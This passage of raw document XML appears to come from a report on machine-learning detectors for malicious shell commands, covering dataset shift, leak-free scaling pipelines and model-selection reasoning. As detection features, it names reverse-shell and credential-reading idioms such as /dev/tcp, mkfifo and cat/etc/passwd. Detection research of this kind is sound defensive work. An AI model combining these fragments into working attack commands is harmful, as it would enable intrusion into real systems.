        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_cross_dataset.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three distinct kinds of shift are measurable between Dataset 1 and Dataset 2, and they compound: the feature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>distributions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> differ, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>direction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of class separation differs, and the features the models </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> differ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Covariate shift: the corpora are nearly separable in feature space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The blunt diagnostic is to discard the malicious/benign label entirely and train a Random Forest on the 43 engineered features alone to answer a different question — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>which corpus did this command come from?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Under 5-fold cross-validation on the pooled training splits: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rows scored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ROC-AUC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all rows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19,860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0.861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benign rows only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14,895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0.852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malicious rows only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4,965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0.970</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 6. Covariate-shift probe: ROC-AUC of a classifier trained to separate Dataset 1 from Dataset 2 rows using the 43 features alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The last row is the important one. In the same 43-dimensional space in which the detector has to separate attacks from benign commands, a Dataset 1 attack and a Dataset 2 attack are almost perfectly distinguishable from one another. A published reverse-shell payload and a command typed into a compromised honeypot are, as feature vectors, further apart than attacks and benign commands are within either corpus. Nothing a model learns about the shape of one is guaranteed to describe the other.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 5.3 — Feature Scaling and Normalisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Sources: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/preprocessing.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scripts/build_dataset.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch6_rf_if_justification.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> §6.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The rule: every fitted transform lives inside the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The assignment requires that any sampling or scaling be fit strictly on the training fold. This project satisfies that structurally rather than by discipline: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>fitted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> transform is ever applied to a dataframe and then split. Each model is an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>imblearn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Pipeline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whose first stages are the transforms —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ImbPipeline([("features", EngineeredFeatures()),</w:t>
        <w:br/>
        <w:t xml:space="preserve">             ("scale",    StandardScaler()),</w:t>
        <w:br/>
        <w:t xml:space="preserve">             ("clf",      clf)])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">— so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StandardScaler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> learns its 43 means and standard deviations from whatever rows the pipeline is handed. Under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StratifiedKFold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cross-validation that is the training fold of each split, refitted once per fold; under holdout evaluation it is the training split alone. The test rows are never seen by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fit</w:t>
      </w:r>
      <w:r>
        <w:t>. The same property covers the two learned representations in the project that genuinely could leak. The char n-gram TF-IDF vocabulary (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CharNgramFeatures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FeatureUnion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stage inside the hybrid pipeline; the CNN's character index table (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CharSequenceEncoder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is fitted inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CNN1DClassifier.fit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> itself (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py:276</w:t>
      </w:r>
      <w:r>
        <w:t>), as is the Isolation Forest's internal transform pipeline. Different mechanics, one guarantee: a vocabulary is only ever built from rows the model is allowed to see.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 6 — Model Selection Justification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project pairs two deliberately different learners on the same T1059.004 task: a gradient-boosted tree ensemble over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>engineered behavioral features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>character-level 1D-CNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over the raw command string. They are chosen to be complementary — one interpretable and feature-driven, one representation-learning and syntax-driven — so that agreement between them is meaningful and their disagreements define the edge cases routed to LLM arbitration (Ch. 8.4). In-domain results back the pairing: XGBoost-hybrid reaches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 0.876 / ROC-AUC 0.979</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 1 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.848 / 0.968</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 2, while the CNN reaches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.860 / 0.975</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.838 / 0.964</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/summary.json</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 XGBoost on engineered features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Gradient-boosted decision trees are the natural fit for the 43-dimensional engineered feature vector (counts, ratios, entropies, binary-family flags):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Interpretability.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tree ensembles expose per-feature gain, so the decision surface is auditable — a first-class requirement for a security detector that a human analyst must trust. Ch. 4's gain ranking (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.181, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.111, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.097) is only possible because the model is inspectable, and it is what let us </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the structural-shortcut risk rather than merely suspect it.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Handles mixed feature types.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The engineered features mix bounded ratios (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ∈ [0,1]), unbounded counts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t>), and binary flags (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t>). Trees split on thresholds and never assume a common scale or distribution, so heterogeneous features coexist without one-hot expansion or feature-specific preprocessing.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Scale-invariant.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splits depend only on rank order, so the raw-magnitude features that dominate the variance ranking (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t>) need no standardization or log-transform — the exact normalization burden that would sink a linear or neural model on these inputs (Ch. 3).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Fast and robust.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> With </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tree_method='hist'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> training is histogram-binned and near-instant on tens of thousands of rows, and Ch. 7 shows F1 is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>saturated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> across almost the entire hyperparameter grid (~0.71–0.735) — a model that is cheap to retrain and hard to misconfigure, which is an operational asset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chen, T. &amp; Guestrin, C. (2016), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>XGBoost: A Scalable Tree Boosting System</w:t>
      </w:r>
      <w:r>
        <w:t>, KDD '16 — the regularized, histogram-based boosting formulation used here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Character-level 1D-CNN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The CNN operates on the raw command as a sequence of character indices, and character-level convolutions capture shell syntax that a word-level model structurally cannot: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Shell "words" are an open, adversarial vocabulary.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Paths, IPs, random dropper names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./qJWIJu99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and base64 blobs mean a word/token model faces near-infinite out-of-vocabulary at test time. Character n-grams generalize across unseen tokens by sharing sub-word structure — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-rf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — and shell frequently omits the whitespace a word tokenizer needs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). A convolution of width </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over character embeddings is exactly a learned character-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-gram detector, so it keys on the operators and idioms that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the tradecraft.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Parallel kernels of sizes 3/5/7.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LotL syntax lives at several scales at once: width-3 catches short motifs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t>), width-5 mid-length tokens (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/</w:t>
      </w:r>
      <w:r>
        <w:t>), width-7 longer signatures (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">base64 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Running the three widths </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>in parallel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not stacked) extracts features at all three receptive fields from the same input and concatenates them (128 × 3 = 384-dim) rather than committing to one width; global max-pooling each branch makes detection position-invariant, so a reverse-shell motif is caught wherever it appears in the line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kim, Y. (2014), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Convolutional Neural Networks for Sentence Classification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, EMNLP 2014 — the multiple-parallel-filter-width CNN adopted here at the character level (with Zhang, Zhao &amp; LeCun (2015), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Character-level Convolutional Networks for Text Classification</w:t>
      </w:r>
      <w:r>
        <w:t>, NeurIPS 2015, motivating the character granularity).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Random Forest and Isolation Forest (models 3 and 4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Random Forest — traditional supervised (bagged trees).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chosen for no-extrapolation robustness to the heavy right tails of the count features: an ensemble of axis-aligned splits cannot be dragged by a single 400-token outlier the way a linear model is, and it needs no scaling (Ch5.3 measures the scaler as a near-no-op for it). Its Gini importance independently reproduces the Ch4 rank-biserial top features — an internal cross-check that the signal is real, not one estimator's artefact — and importance mass spreads across all 43 features rather than one shortcut, which is anti-shortcut evidence. Production: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators=400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth=24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class_weight="balanced_subsample"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_features="sqrt"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Breiman (2001), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Random Forests</w:t>
      </w:r>
      <w:r>
        <w:t>; the char-level RF result on shell commands in ShellCore (IEEE IoT J., 2022).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Isolation Forest — unsupervised / anomaly detection.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chosen as the label-free, cold-start detector and the cascade's fast stage-1 filter: it isolates anomalies in a handful of random splits, so it scales linearly and needs no attack labels — the one measurement of how far pure statistical strangeness carries before supervision is required. It is honestly weak at a fixed 0.5 threshold (F1 0.249 / 0.143) but ranks soundly (ROC-AUC 0.812 / 0.677), so Ch7 and Ch8.4 consume its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ranking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not its raw decision. Production: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators=300</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_samples=0.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination=0.25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Liu, Ting &amp; Zhou (2008 / 2012), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Isolation Forest / Isolation-based Anomaly Detection</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 7 — Hyperparameter Sensitivity Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter reports one-at-a-time (OAT) sensitivity sweeps for the two production candidate models — the gradient-boosted tree ensemble (XGBoost) and the character/token CNN — on the binary attack/benign command-line task (MITRE ATT&amp;CK T1059.004, 1:3 attack:benign). Each sweep fixes every hyperparameter at its default and varies a single one across a small grid, recording the resulting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>false-positive rate (FPR)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the held-out test split (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_test = 3049</w:t>
